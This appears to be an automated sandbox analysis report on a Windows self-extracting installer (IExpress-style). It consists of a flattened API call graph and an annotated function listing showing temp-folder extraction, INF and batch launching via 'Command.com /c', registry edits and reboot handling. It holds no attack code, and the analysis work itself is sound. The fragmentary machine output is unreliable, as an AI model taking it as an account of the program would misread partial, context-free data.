LoadLibraryA 3051->3148 3054 10016c9 GetCurrentProcess OpenProcessToken 3055 10016e4 GetTokenInformation 3054->3055 3054->3056 3057 1001790 CloseHandle 3055->3057 3058 1001700 GetLastError 3055->3058 3056->2900 3068 1004161 FindResourceA 3056->3068 3057->3056 3058->3057 3059 100170f LocalAlloc 3058->3059 3060 1001720 GetTokenInformation 3059->3060 3061 100178f 3059->3061 3062 1001733 AllocateAndInitializeSid 3060->3062 3063 1001788 LocalFree 3060->3063 3061->3057 3062->3063 3066 1001754 3062->3066 3063->3061 3064 100177f FreeSid 3064->3063 3065 100175b EqualSid 3065->3066 3067 1001772 3065->3067 3066->3064 3066->3065 3066->3067 3067->3064 3069 10041b1 3068->3069 3070 100417c LoadResource 3068->3070 3072 10038cc 24 API calls 3069->3072 3070->3069 3071 100418a DialogBoxIndirectParamA FreeResource 3070->3071 3071->3069 3073 10041c1 3071->3073 3072->3073 3073->2878 3076 1005bf2 3075->3076 3077 1005c15 3076->3077 3079 1005c07 CharNextA 3076->3079 3090 1005ad3 3076->3090 3077->2972 3079->3076 3081 1005b47 CharPrevA 3080->3081 3082 1005b54 lstrcpyA 3080->3082 3081->3082 3082->2991 3085 1002868 lstrlenA 3084->3085 3086 1002874 3084->3086 3085->3086 3086->2991 3088 10038cc 24 API calls 3087->3088 3089 10018b4 3088->3089 3089->2981 3089->2982 3091 1005ae9 3090->3091 3092 1005ade IsDBCSLeadByte 3090->3092 3091->3076 3092->3091 3094 1002ac7 3093->3094 3095 1002aaf LoadStringA 3093->3095 3094->2999 3094->3000 3095->3094 3097 1005d45 GetVersionExA 3096->3097 3104 1003914 3096->3104 3098 1005d65 3097->3098 3097->3104 3099 1005d83 GetSystemMetrics 3098->3099 3098->3104 3100 1005d8f RegOpenKeyExA 3099->3100 3099->3104 3101 1005dae RegQueryValueExA RegCloseKey 3100->3101 3100->3104 3102 1005ddb 3101->3102 3101->3104 3111 1005c1c 3102->3111 3104->3012 3105 1005cd4 3104->3105 3106 1005ce0 3105->3106 3109 1005d0b 3105->3109 3115 1005c9f EnumResourceLanguagesA 3106->3115 3108 1005cf7 3108->3109 3116 1005c9f EnumResourceLanguagesA 3108->3116 3109->3012 3112 1005c23 3111->3112 3113 1005c4f CharNextA 3112->3113 3114 1005c5d 3112->3114 3113->3112 3114->3104 3115->3108 3116->3109 3118 10027d0 3117->3118 3128 10026b1 3117->3128 3120 10027f1 3118->3120 3121 10027e8 GlobalFree 3118->3121 3120->3039 3121->3120 3122 10026e8 GetFileVersionInfoSizeA 3123 10026ff GlobalAlloc 3122->3123 3122->3128 3123->3118 3124 1002713 GlobalLock 3123->3124 3124->3118 3125 1002724 GetFileVersionInfoA 3124->3125 3126 1002737 VerQueryValueA 3125->3126 3127 10027a9 GlobalUnlock 3125->3127 3126->3127 3126->3128 3127->3128 3128->3118 3128->3122 3128->3127 3129 10027f8 GlobalUnlock 3128->3129 3130 1002081 3128->3130 3129->3118 3131 10020a3 CharUpperA CharNextA CharNextA 3130->3131 3132 100218c GetSystemDirectoryA 3130->3132 3131->3132 3133 10020c7 3131->3133 3135 100219e 3132->3135 3136 10020d0 lstrcpyA 3133->3136 3137 100217e GetWindowsDirectoryA 3133->3137 3138 10021ad 3135->3138 3140 1005b32 3 API calls 3135->3140 3139 1005b32 3 API calls 3136->3139 3137->3135 3138->3128 3141 10020f9 RegOpenKeyExA 3139->3141 3140->3138 3141->3135 3142 100211e RegQueryValueExA 3141->3142 3143 1002173 RegCloseKey 3142->3143 3144 100213d 3142->3144 3143->3135 3145 1002143 ExpandEnvironmentStringsA 3144->3145 3146 1002166 3144->3146 3145->3146 3147 1002158 lstrcpyA 3145->3147 3146->3143 3147->3146 3149 1001683 3148->3149 3150 1001627 GetProcAddress 3148->3150 3149->3054 3149->3056 3151 1001679 FreeLibrary 3150->3151 3152 100163a AllocateAndInitializeSid 3150->3152 3151->3149 3153 1001678 3152->3153 3154 1001668 FreeSid 3152->3154 3153->3151 3154->3153 3157 1002a34 6 API calls 3156->3157 3158 1003dad LocalAlloc 3157->3158 3159 1003dc1 3158->3159 3160 1003ddd 3158->3160 3161 10038cc 24 API calls 3159->3161 3162 1002a34 6 API calls 3160->3162 3163 1003dd1 3161->3163 3164 1003de5 3162->3164 3165 1003547 3 API calls 3163->3165 3166 1003de9 3164->3166 3167 1003e0c lstrcmpA 3164->3167 3168 1003dd6 3165->3168 3169 10038cc 24 API calls 3166->3169 3170 1003e28 3167->3170 3171 1003e1c LocalFree 3167->3171 3173 1003e23 3168->3173 3174 1003df9 LocalFree 3169->3174 3172 10038cc 24 API calls 3170->3172 3171->3173 3175 1003e39 LocalFree 3172->3175 3173->2910 3173->2913 3173->2934 3174->3173 3175->3168 3177 1002a34 6 API calls 3176->3177 3178 1003d25 3177->3178 3179 1003d2c 3178->3179 3180 1003d62 3178->3180 3182 10038cc 24 API calls 3179->3182 3181 1002a34 6 API calls 3180->3181 3183 1003d73 3181->3183 3184 1003d3c 3182->3184 3339 1003566 wsprintfA FindResourceA 3183->3339 3185 1003d91 3184->3185 3185->2915 3188 1003d81 3190 10038cc 24 API calls 3188->3190 3189 1003d95 3189->2915 3190->3185 3192 1002a34 6 API calls 3191->3192 3193 1005651 LocalAlloc 3192->3193 3194 1005667 3193->3194 3195 1005688 3193->3195 3196 10038cc 24 API calls 3194->3196 3197 1002a34 6 API calls 3195->3197 3198 1005677 3196->3198 3199 1005690 3197->3199 3202 1003547 3 API calls 3198->3202 3200 1005694 3199->3200 3201 10056b7 lstrcmpA 3199->3201 3203 10038cc 24 API calls 3200->3203 3204 10056d0 LocalFree 3201->3204 3205 10056ca 3201->3205 3206 100567c 3202->3206 3207 10056a4 LocalFree 3203->3207 3208 10056e0 3204->3208 3209 100571b 3204->3209 3205->3204 3228 1005681 3206->3228 3207->3228 3215 1004b1a 63 API calls 3208->3215 3210 10058db 3209->3210 3211 1005735 GetTempPathA 3209->3211 3212 1004161 28 API calls 3210->3212 3213 1005769 3211->3213 3214 100574a 3211->3214 3212->3228 3218 100577a lstrcpyA 3213->3218 3221 100578d GetDriveTypeA 3213->3221 3222 10058ad GetWindowsDirectoryA 3213->3222 3213->3228 3346 1004b1a 3214->3346 3217 1005702 3215->3217 3220 1005706 3217->3220 3217->3228 3218->3213 3223 10038cc 24 API calls 3220->3223 3224 10057a0 GetFileAttributesA 3221->3224 3237 100579b 3221->3237 3381 1003f0d 3222->3381 3223->3206 3224->3237 3228->2921 3228->2934 3239 1004112 GetWindowsDirectoryA 3228->3239 3229 1004b1a 63 API calls 3229->3213 3230 1001f6e 25 API calls 3230->3237 3232 1005833 GetWindowsDirectoryA 3232->3237 3233 1003f0d 40 API calls 3233->3237 3234 1005b32 3 API calls 3234->3237 3236 1005874 SetFileAttributesA lstrcpyA 3238 1004b1a 63 API calls 3236->3238 3237->3213 3237->3224 3237->3228 3237->3230 3237->3232 3237->3233 3237->3234 3237->3236 3374 1005e13 3237->3374 3378 1001f4b GetFileAttributesA 3237->3378 3238->3237 3240 1004131 3239->3240 3241 100414f 3239->3241 3242 10038cc 24 API calls 3240->3242 3243 1003f0d 40 API calls 3241->3243 3244 1004141 3242->3244 3245 100415f 3243->3245 3246 1003547 3 API calls 3244->3246 3245->2929 3247 1004146 3246->3247 3247->2929 3249 100520f 3248->3249 3249->3249 3250 1005256 3249->3250 3251 100522f 3249->3251 3452 10049db 3250->3452 3253 1004161 28 API calls 3251->3253 3254 1005254 3253->3254 3255 1003566 9 API calls 3254->3255 3256 100525f 3254->3256 3255->3256 3256->2924 3258 1001f03 3257->3258 3259 1001f2c 3257->3259 3261 1001f20 3258->3261 3262 1001f08 3258->3262 3601 1001ddf GetWindowsDirectoryA 3259->3601 3596 1001ea3 RegOpenKeyExA 3261->3596 3264 1001f1e 3262->3264 3591 1001e52 RegOpenKeyExA 3262->3591 3264->2935 3267 10052ad 3266->3267 3276 10052e8 3266->3276 3268 1002a34 6 API calls 3267->3268 3269 10052be 3268->3269 3271 10052c7 3269->3271 3269->3276 3270 1005400 lstrcpyA 3270->3276 3272 10038cc 24 API calls 3271->3272 3300 10052d7 3272->3300 3274 1002a34 6 API calls 3274->3276 3275 10053df 3277 10038cc 24 API calls 3275->3277 3276->3270 3276->3274 3276->3275 3278 10053f9 3276->3278 3279 1005440 lstrcmpiA 3276->3279 3282 10055bd 3276->3282 3284 1005591 LocalFree 3276->3284 3285 100562c LocalFree 3276->3285 3288 10055a3 3276->3288 3294 10053a3 lstrcmpiA 3276->3294 3301 10054c0 3276->3301 3607 10022ff lstrcpyA 3276->3607 3659 100198b RegCreateKeyExA 3276->3659 3680 1004560 3276->3680 3277->3300 3278->2933 3279->3276 3279->3288 3283 10038cc 24 API calls 3282->3283 3287 10055cd LocalFree 3283->3287 3284->3276 3284->3288 3285->3278 3287->3278 3288->3278 3700 1001b8b 3288->3700 3290 10055e1 3293 10038cc 24 API calls 3290->3293 3291 10054d4 GetProcAddress 3292 10055f7 3291->3292 3291->3301 3295 10038cc 24 API calls 3292->3295 3296 10055f5 3293->3296 3294->3276 3298 100560b FreeLibrary 3295->3298 3297 1005612 LocalFree 3296->3297 3299 1003547 3 API calls 3297->3299 3298->3297 3299->3300 3300->3278 3301->3290 3301->3291 3302 1005575 FreeLibrary 3301->3302 3303 1005626 FreeLibrary 3301->3303 3693 100370f lstrcpyA 3301->3693 3302->3284 3303->3285 3305 1002a34 6 API calls 3304->3305 3306 1004493 LocalAlloc 3305->3306 3307 10044c6 3306->3307 3308 10044aa 3306->3308 3310 1002a34 6 API calls 3307->3310 3309 10038cc 24 API calls 3308->3309 3311 10044ba 3309->3311 3312 10044ce 3310->3312 3313 1003547 3 API calls 3311->3313 3314 10044d2 3312->3314 3315 10044fa lstrcmpA 3312->3315 3321 10044bf 3313->3321 3316 10038cc 24 API calls 3314->3316 3317 1004547 LocalFree 3315->3317 3318 100450f 3315->3318 3319 10044e2 LocalFree 3316->3319 3317->3321 3320 1004161 28 API calls 3318->3320 3319->3321 3322 1004527 LocalFree 3320->3322 3321->2910 3321->2934 3322->3321 3324 1003554 GetLastError 3323->3324 3325 1003558 GetLastError 3323->3325 3324->2932 3325->2932 3327 1002a34 6 API calls 3326->3327 3328 100466a LocalAlloc 3327->3328 3329 1004690 3328->3329 3330 100467e 3328->3330 3332 1002a34 6 API calls 3329->3332 3331 10038cc 24 API calls 3330->3331 3334 100468e 3331->3334 3333 1004698 3332->3333 3335 10046a8 lstrcmpA 3333->3335 3336 100469c 3333->3336 3334->2934 3335->3336 3337 10046c8 LocalFree 3335->3337 3338 10038cc 24 API calls 3336->3338 3337->3334 3338->3337 3344 1003613 3339->3344 3345 10035a4 3339->3345 3340 10035a9 LoadResource LockResource 3341 10035be lstrlenA 3340->3341 3340->3344 3341->3345 3342 1003624 FreeResource 3342->3344 3343 10035e7 FreeResource wsprintfA FindResourceA 3343->3344 3343->3345 3344->3188 3344->3189 3345->3340 3345->3342 3345->3343 3347 1004ba7 lstrcpyA 3346->3347 3348 1004b2c 3346->3348 3350 1004ba5 3347->3350 3409 1002f7a 3348->3409 3418 1003e60 lstrlenA LocalAlloc 3350->3418 3353 1004b43 lstrcpyA 3355 1004b9a 3353->3355 3356 1004b5f GetSystemInfo 3353->3356 3363 1005b32 3 API calls 3355->3363 3359 1004b71 3356->3359 3357 1004bc0 CreateDirectoryA 3360 1004bcc 3357->3360 3361 1004bef 3357->3361 3358 1004bd6 3362 1003f0d 40 API calls 3358->3362 3359->3355 3367 1005b32 3 API calls 3359->3367 3360->3358 3365 1003547 3 API calls 3361->3365 3364 1004be0 3362->3364 3363->3350 3366 1004be4 3364->3366 3369 1004c03 RemoveDirectoryA 3364->3369 3368 1004bf4 3365->3368 3366->3228 3370 1001f6e GetWindowsDirectoryA 3366->3370 3367->3355 3368->3366 3369->3366 3371 1001f9d 3370->3371 3372 1001f8d 3370->3372 3371->3213 3371->3229 3373 10038cc 24 API calls 3372->3373 3373->3371 3375 1005e49 3374->3375 3376 1005e2e GetDiskFreeSpaceA 3374->3376 3375->3237 3376->3375 3377 1005e4d MulDiv 3376->3377 3377->3375 3379 1001f5a CreateDirectoryA 3378->3379 3380 1001f68 3378->3380 3379->3380 3380->3237 3382 1003f21 3381->3382 3383 1003f29 GetCurrentDirectoryA SetCurrentDirectoryA 3381->3383 3382->3213 3384 1003f4c 3383->3384 3385 1003f6d 3383->3385 3386 10038cc 24 API calls 3384->3386 3431 1005e67 GetDiskFreeSpaceA 3385->3431 3388 1003f5c 3386->3388 3390 1003547 3 API calls 3388->3390 3395 1003f61 3390->3395 3391 1003fd2 GetVolumeInformationA 3393 1003fea 3391->3393 3394 100404f SetCurrentDirectoryA lstrcpynA 3391->3394 3392 1003f7d 3396 1003547 3 API calls 3392->3396 3397 1003547 3 API calls 3393->3397 3398 100406e 3394->3398 3395->3382 3399 1003f98 GetLastError FormatMessageA 3396->3399 3401 1004003 GetLastError FormatMessageA 3397->3401 3403 1004082 3398->3403 3407 1004097 3398->3407 3400 100403b 3399->3400 3402 10038cc 24 API calls 3400->3402 3401->3400 3404 1004041 SetCurrentDirectoryA 3402->3404 3405 10038cc 24 API calls 3403->3405 3404->3382 3406 1004092 3405->3406 3406->3407 3407->3382 3434 1001fce 3407->3434 3410 1002f8f wsprintfA lstrcpyA 3409->3410 3411 1005b32 3 API calls 3410->3411 3412 1002fbd RemoveDirectoryA GetFileAttributesA 3411->3412 3413 1003015 CreateDirectoryA 3412->3413 3414 1002fd6 3412->3414 3415 1002fde GetTempFileNameA 3413->3415 3416 1003006 3413->3416 3414->3410 3414->3415 3415->3416 3417 1002ff7 DeleteFileA CreateDirectoryA 3415->3417 3416->3353 3416->3366 3417->3416 3419 1003ea0 lstrcpyA 3418->3419 3420 1003e82 3418->3420 3422 1005b32 3 API calls 3419->3422 3421 10038cc 24 API calls 3420->3421 3423 1003e92 3421->3423 3424 1003eb4 CreateFileA LocalFree 3422->3424 3425 1003547 3 API calls 3423->3425 3426 1003ed8 CloseHandle GetFileAttributesA 3424->3426 3427 1003eeb 3424->3427 3429 1003e97 3425->3429 3426->3427 3428 1003547 3 API calls 3427->3428 3430 1003eef 3427->3430 3428->3430 3429->3430 3430->3357 3430->3358 3432 1005e9a MulDiv 3431->3432 3433 1003f77 3431->3433 3432->3433 3433->3391 3433->3392 3435 1001fea 3434->3435 3436 100200e 3434->3436 3449 1001fb1 wsprintfA 3435->3449 3438 1002043 3436->3438 3439 1002014 3436->3439 3442 100200c 3438->3442 3451 1001fb1 wsprintfA 3438->3451 3450 1001fb1 wsprintfA 3439->3450 3440 1002000 3443 10038cc 24 API calls 3440->3443 3442->3382 3443->3442 3444 100202b 3446 10038cc 24 API calls 3444->3446 3446->3442 3447 100205f 3448 10038cc 24 API calls 3447->3448 3448->3442 3449->3440 3450->3444 3451->3447 3473 1002e6f 3452->3473 3454 10049e0 3455 10049e4 3454->3455 3456 10049f3 GetDlgItem ShowWindow GetDlgItem ShowWindow 3454->3456 3457 1004a1d 3454->3457 3455->3254 3456->3457 3476 1003c60 3457->3476 3459 1004a2c 3461 10038cc 24 API calls 3459->3461 3460 1004a28 3460->3459 3482 1006e88 3460->3482 3462 1004abb 3461->3462 3464 1004abd 3462->3464 3466 1004ad3 3464->3466 3467 1004ac6 FreeResource 3464->3467 3465 1004a8c 3465->3459 3465->3464 3468 1004aef 3466->3468 3469 1004adf 3466->3469 3467->3466 3470 1004b14 3468->3470 3472 1004b01 SendMessageA 3468->3472 3471 10038cc 24 API calls 3469->3471 3470->3254 3471->3468 3472->3470 3474 1002a34 6 API calls 3473->3474 3475 1002e7f FindResourceA LoadResource LockResource 3474->3475 3475->3454 3477 1003c9f 3476->3477 3481 1003cf6 3477->3481 3487 1003b9b 3477->3487 3479 1003cbd 3479->3481 3495 1002cb2 3479->3495 3481->3460 3483 1006ec3 3482->3483 3484 1006f9b 3483->3484 3511 1005bca GetFileAttributesA 3483->3511 3513 1006d39 3483->3513 3484->3465 3488 1003ba9 3487->3488 3489 1003bda lstrcmpA 3488->3489 3490 1003bbe 3488->3490 3491 1003c2e 3489->3491 3494 1003bd3 3489->3494 3492 10038cc 24 API calls 3490->3492 3498 1003b00 3491->3498 3492->3494 3494->3479 3496 1002ce5 CloseHandle 3495->3496 3497 1002cc9 3495->3497 3496->3497 3497->3481 3499 1003b08 3498->3499 3500 1003b10 CreateFileA 3498->3500 3499->3494 3500->3499 3502 1003b7b 3500->3502 3502->3499 3503 1003b80 3502->3503 3506 1002b34 3503->3506 3507 1002b97 CreateFileA 3506->3507 3508 1002b3f 3506->3508 3507->3499 3508->3507 3509 1002b89 CharNextA 3508->3509 3510 1002b7a CreateDirectoryA 3508->3510 3509->3508 3510->3509 3512 1005bd9 3511->3512 3512->3483 3514 1006df4 3513->3514 3516 1006d4d 3513->3516 3518 1002cb2 CloseHandle 3514->3518 3528 1004888 3514->3528 3515 1006dcb 3515->3483 3516->3514 3516->3515 3520 1002c23 3516->3520 3518->3515 3556 100288f 3520->3556 3523 1002c3a 3523->3516 3524 1002c3f WriteFile 3525 1002c68 3524->3525 3526 1002c63 3524->3526 3525->3526 3527 1002c89 SendDlgItemMessageA 3525->3527 3526->3516 3527->3526 3529 10048b5 3528->3529 3530 100489b 3528->3530 3531 10049d0 3529->3531 3532 10048c1 3529->3532 3533 10048ac 3530->3533 3535 1002cb2 CloseHandle 3530->3535 3590 1002e1b lstrcpyA lstrcpyA lstrcpyA 3531->3590 3532->3533 3536 10048c7 3532->3536 3537 100493e 3532->3537 3533->3515 3535->3533 3536->3533 3563 1002acd lstrlenA lstrlenA 3536->3563 3538 1004959 3537->3538 3539 100494a SetDlgItemTextA 3537->3539 3540 1002acd 8 API calls 3538->3540 3539->3538 3542 1004972 3540->3542 3542->3533 3543 100497a 3542->3543 3574 1004809 3543->3574 3549 1003b9b 29 API calls 3552 10049a4 3549->3552 3550 1002cb2 CloseHandle 3551 1004916 3550->3551 3553 1004923 SetFileAttributesA 3551->3553 3552->3533 3581 1003a7a LocalAlloc 3552->3581 3553->3533 3557 10028a6 MsgWaitForMultipleObjects 3556->3557 3558 10028f3 3557->3558 3559 10028bd PeekMessageA 3557->3559 3558->3523 3558->3524 3559->3557 3560 10028cb 3559->3560 3560->3557 3560->3558 3561 10028d6 DispatchMessageA 3560->3561 3562 10028e0 PeekMessageA 3560->3562 3561->3562 3562->3560 3564 1002af1 lstrcpyA lstrlenA 3563->3564 3565 1002aed 3563->3565 3566 1002b21 lstrcatA 3564->3566 3567 1002b08 lstrlenA 3564->3567 3565->3533 3569 1002d87 3565->3569 3566->3565 3567->3566 3568 1002b12 lstrlenA lstrlenA 3567->3568 3568->3566 3570 1002da0 3569->3570 3571 1002da4 DosDateTimeToFileTime 3569->3571 3570->3533 3570->3550 3571->3570 3572 1002db8 LocalFileTimeToFileTime 3571->3572 3572->3570 3573 1002dca SetFileTime 3572->3573 3573->3570 3575 1005bca GetFileAttributesA 3574->3575 3577 100481b 3575->3577 3576 1004870 SetFileAttributesA 3580 100481f 3576->3580 3577->3576 3578 1004161 28 API calls 3577->3578 3577->3580 3579 1004859 3578->3579 3579->3576 3579->3580 3580->3533 3580->3549 3582 1003a91 3581->3582 3583 1003aa8 lstrlenA LocalAlloc 3581->3583 3584 10038cc 24 API calls 3582->3584 3585 1003ade lstrcpyA 3583->3585 3586 1003abe 3583->3586 3588 1003aa6 3584->3588 3585->3588 3587 10038cc 24 API calls 3586->3587 3589 1003ad3 LocalFree 3587->3589 3588->3533 3589->3588 3590->3533 3592 1001e78 RegQueryValueExA 3591->3592 3593 1001e9b 3591->3593 3594 1001e92 RegCloseKey 3592->3594 3595 1001e8f 3592->3595 3593->3264 3594->3593 3595->3594 3597 1001ef0 3596->3597 3598 1001ec9 RegQueryInfoKeyA 3596->3598 3597->3264 3599 1001ee4 3598->3599 3600 1001ee7 RegCloseKey 3598->3600 3599->3600 3600->3597 3602 1001e01 3601->3602 3603 1001e4c 3601->3603 3604 1005b32 3 API calls 3602->3604 3603->3264 3605 1001e13 WritePrivateProfileStringA _lopen 3604->3605 3605->3603 3606 1001e39 _llseek _lclose 3605->3606 3606->3603 3608 1002326 3607->3608 3709 1001840 3608->3709 3613 1002360 lstrcpyA 3615 1005b32 3 API calls 3613->3615 3614 1002377 lstrcpyA 3616 1002375 3614->3616 3615->3616 3617 1005be8 2 API calls 3616->3617 3618 1002383 3617->3618 3619 1002511 3618->3619 3620 1002391 lstrcmpiA 3618->3620 3621 1005be8 2 API calls 3619->3621 3620->3619 3622 10023a1 3620->3622 3623 1002519 3621->3623 3624 1005bca GetFileAttributesA 3622->3624 3625 1002575 LocalAlloc 3623->3625 3626 100251f lstrcmpiA 3623->3626 3627 10023ad 3624->3627 3629 10023b1 3625->3629 3630 100259d GetFileAttributesA 3625->3630 3626->3625 3628 100252b lstrlenA lstrlenA LocalAlloc 3626->3628 3627->3629 3632 1001840 2 API calls 3627->3632 3628->3629 3631 100255e wsprintfA 3628->3631 3638 10038cc 24 API calls 3629->3638 3633 10025e6 3630->3633 3634 10025af 3630->3634 3637 1002601 3631->3637 3639 10023db lstrlenA 3632->3639 3636 10025e9 lstrcpyA 3633->3636 3634->3633 3635 10025b3 lstrcpyA 3634->3635 3640 10025f2 3635->3640 3641 10025ca 3635->3641 3636->3640 3637->3276 3642 1002599 3638->3642 3643 1002411 3639->3643 3644 10023ee 3639->3644 3718 10021fb 3640->3718 3641->3640 3645 10025cf lstrcatA 3641->3645 3642->3637 3646 1002414 LocalAlloc 3643->3646 3648 1001840 2 API calls 3644->3648 3645->3636 3646->3629 3649 100243a GetPrivateProfileIntA GetPrivateProfileStringA 3646->3649 3650 1002404 3648->3650 3653 1002490 lstrcpyA lstrcpyA 3649->3653 3654 10024b5 3649->3654 3650->3646 3652 100240c lstrlenA 3650->3652 3652->3646 3653->3637 3656 10024e6 wsprintfA 3654->3656 3657 10024c6 GetShortPathNameA 3654->3657 3656->3637 3657->3656 3660 10019f2 3659->3660 3661 1001b86 3659->3661 3662 1001a00 wsprintfA RegQueryValueExA 3660->3662 3663 1001a2f 3660->3663 3661->3276 3662->3660 3662->3663 3664 1001a34 RegCloseKey 3663->3664 3665 1001a49 GetSystemDirectoryA 3663->3665 3664->3661 3666 1005b32 3 API calls 3665->3666 3667 1001a6d LoadLibraryA 3666->3667 3668 1001a85 GetProcAddress FreeLibrary 3667->3668 3669 1001b0b GetModuleFileNameA 3667->3669 3668->3669 3672 1001aa9 GetSystemDirectoryA 3668->3672 3670 1001b23 RegCloseKey 3669->3670 3671 1001acc lstrlenA lstrlenA LocalAlloc 3669->3671 3670->3661 3674 1001af9 3671->3674 3675 1001b2e wsprintfA lstrlenA RegSetValueExA RegCloseKey LocalFree 3671->3675 3672->3671 3673 1001abb 3672->3673 3676 1005b32 3 API calls 3673->3676 3677 10038cc 24 API calls 3674->3677 3675->3661 3676->3671 3679 1001b09 3677->3679 3679->3670 3681 100457b CreateProcessA 3680->3681 3690 100464c 3680->3690 3682 1004609 3681->3682 3683 100459f WaitForSingleObject GetExitCodeProcess 3681->3683 3684 1003547 3 API calls 3682->3684 3685 10045c2 3683->3685 3691 10045dd 3683->3691 3686 100460e GetLastError FormatMessageA 3684->3686 3685->3691 3689 10038cc 24 API calls 3686->3689 3689->3690 3690->3276 3744 10028fa 3691->3744 3692 1004602 3692->3690 3694 1005b32 3 API calls 3693->3694 3695 1003739 GetFileAttributesA 3694->3695 3696 1003762 LoadLibraryA 3695->3696 3697 100374b 3695->3697 3699 100376b 3696->3699 3697->3696 3698 100374f LoadLibraryExA 3697->3698 3698->3699 3699->3301 3701 1001ba3 RegOpenKeyExA 3700->3701 3702 1001c7c 3700->3702 3701->3702 3703 1001bc5 RegQueryValueExA 3701->3703 3702->3278 3704 1001bf1 GetSystemDirectoryA 3703->3704 3705 1001c72 RegCloseKey 3703->3705 3706 1001c1d 3704->3706 3707 1001c2e wsprintfA lstrlenA RegSetValueExA 3704->3707 3705->3702 3708 1005b32 3 API calls 3706->3708 3707->3705 3708->3707 3710 100184f 3709->3710 3712 1001866 3710->3712 3714 100186e 3710->3714 3732 1005b00 3710->3732 3713 1005b00 2 API calls 3712->3713 3712->3714 3713->3712 3715 1001da9 3714->3715 3716 1001db2 lstrlenA 3715->3716 3717 1001dbe 3715->3717 3716->3717 3717->3613 3717->3614 3719 100221c 3718->3719 3728 10022ef 3718->3728 3720 1002225 GetModuleFileNameA 3719->3720 3719->3728 3726 1002247 3720->3726 3720->3728 3721 1002255 IsDBCSLeadByte 3721->3726 3722 10022db CharNextA 3724 10022e0 CharNextA 3722->3724 3723 100226f CharNextA CharUpperA 3725 10022b1 CharUpperA 3723->3725 3723->3726 3724->3721 3724->3728 3725->3726 3727 10022bf lstrcpyA lstrlenA 3725->3727 3726->3721 3726->3722 3726->3723 3726->3724 3737 1005b71 lstrlenA CharPrevA 3726->3737 3727->3724 3728->3637 3731 10022a7 3731->3727 3733 1005b07 3732->3733 3734 1005b28 3733->3734 3735 1005ad3 IsDBCSLeadByte 3733->3735 3736 1005b1a CharNextA 3733->3736 3734->3710 3735->3733 3736->3733 3738 1005b97 CharPrevA 3737->3738 3739 1005ba0 3738->3739 3740 1005b91 3738->3740 3741 1005bb2 CharNextA 3739->3741 3742 1005ba9 CharPrevA 3739->3742 3743 100228c lstrlenA CharPrevA 3739->3743 3740->3738 3740->3739 3741->3743 3742->3741 3742->3743 3743->3727 3743->3731 3745 1002909 3744->3745 3747 1002903 CloseHandle CloseHandle 3744->3747 3748 1002613 3745->3748 3747->3690 3747->3692 3749 1002620 3748->3749 3751 1002634 3748->3751 3752 1001f34 3749->3752 3751->3747 3753 1001ef8 14 API calls 3752->3753 3754 1001f3d 3753->3754 3754->3751 3756 1001953 RegOpenKeyExA 3755->3756 3757 1001989 3755->3757 3756->3757 3758 1001972 RegDeleteValueA RegCloseKey 3756->3758 3757->2942 3758->3757 3760 10018e1 LookupPrivilegeValueA AdjustTokenPrivileges 3759->3760 3761 10018d5 3759->3761 3760->3761 3762 1001920 ExitWindowsEx 3760->3762 3764 10038cc 24 API calls 3761->3764 3762->3761 3763 100193c 3762->3763 3763->2960 3764->3763

                                                                                                Executed Functions

                                                                                                Function 010022FF Relevance: 59.8, APIs: 23, Strings: 11, Instructions: 255stringmemoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 10022ff-1002324 lstrcpyA 1 1002333-1002339 0->1 2 1002326-1002331 0->2 3 100233e-100235e call 1001840 call 1001da9 1->3 2->3 8 1002360-1002375 lstrcpyA call 1005b32 3->8 9 1002377-1002379 lstrcpyA 3->9 11 100237b-100238b call 1005be8 8->11 9->11 15 1002511-100251d call 1005be8 11->15 16 1002391-100239b lstrcmpiA 11->16 21 1002575-1002587 LocalAlloc 15->21 22 100251f-1002529 lstrcmpiA 15->22 16->15 18 10023a1-10023af call 1005bca 16->18 27 10023b1-10023c2 18->27 28 10023c7-10023ec call 1001840 lstrlenA 18->28 25 1002589-1002593 21->25 26 100259d-10025ad GetFileAttributesA 21->26 22->21 24 100252b-1002558 lstrlenA * 2 LocalAlloc 22->24 29 100242a-1002435 24->29 30 100255e-1002570 wsprintfA 24->30 31 1002594-100259b call 10038cc 25->31 33 10025e6 26->33 34 10025af-10025b1 26->34 27->31 44 1002411 28->44 45 10023ee-10023f1 28->45 29->31 37 1002601-100260b 30->37 42 100260c-1002610 31->42 36 10025e9-10025f0 lstrcpyA 33->36 34->33 35 10025b3-10025c8 lstrcpyA 34->35 40 10025f2-10025fc call 10021fb 35->40 41 10025ca-10025cd 35->41 36->40 37->42 40->37 41->40 46 10025cf-10025e4 lstrcatA 41->46 47 1002414-1002428 LocalAlloc 44->47 49 10023f3 45->49 50 10023f6-100240a call 1001840 45->50 46->36 47->29 52 100243a-1002444 47->52 49->50 50->47 56 100240c-100240f lstrlenA 50->56 54 1002446 52->54 55 1002448-100248e GetPrivateProfileIntA GetPrivateProfileStringA 52->55 54->55 57 1002490-100249a 55->57 58 10024b5-10024c4 55->58 56->47 59 100249c 57->59 60 100249e-10024b0 lstrcpyA * 2 57->60 61 10024e6 58->61 62 10024c6-10024e4 GetShortPathNameA 58->62 59->60 60->37 63 10024eb-10024ee 61->63 62->63 64 10024f0 63->64 65 10024f2-100250c wsprintfA 63->65 64->65 65->37
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,00000000,00000001,771AF530,00000000), ref: 0100231B
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,01001324), ref: 01002366
                                                                                                • lstrcpyA.KERNEL32(?,?,?,?,01001324), ref: 01002379
                                                                                                • lstrcmpiA.KERNEL32(00000000,.INF), ref: 01002397
                                                                                                • lstrlenA.KERNEL32(DefaultInstall,?,01001318,?), ref: 010023E8
                                                                                                • lstrlenA.KERNEL32(?,?,01001314), ref: 0100240D
                                                                                                • LocalAlloc.KERNEL32(00000040,00000200), ref: 0100241B
                                                                                                • GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 01002457
                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01001251,?,00000008,?), ref: 01002486
                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 010024A2
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 010024AE
                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 010024DE
                                                                                                • wsprintfA.USER32 ref: 01002503
                                                                                                • lstrcmpiA.KERNEL32(00000000,.BAT), ref: 01002525
                                                                                                • lstrlenA.KERNEL32(Command.com /c %s), ref: 01002537
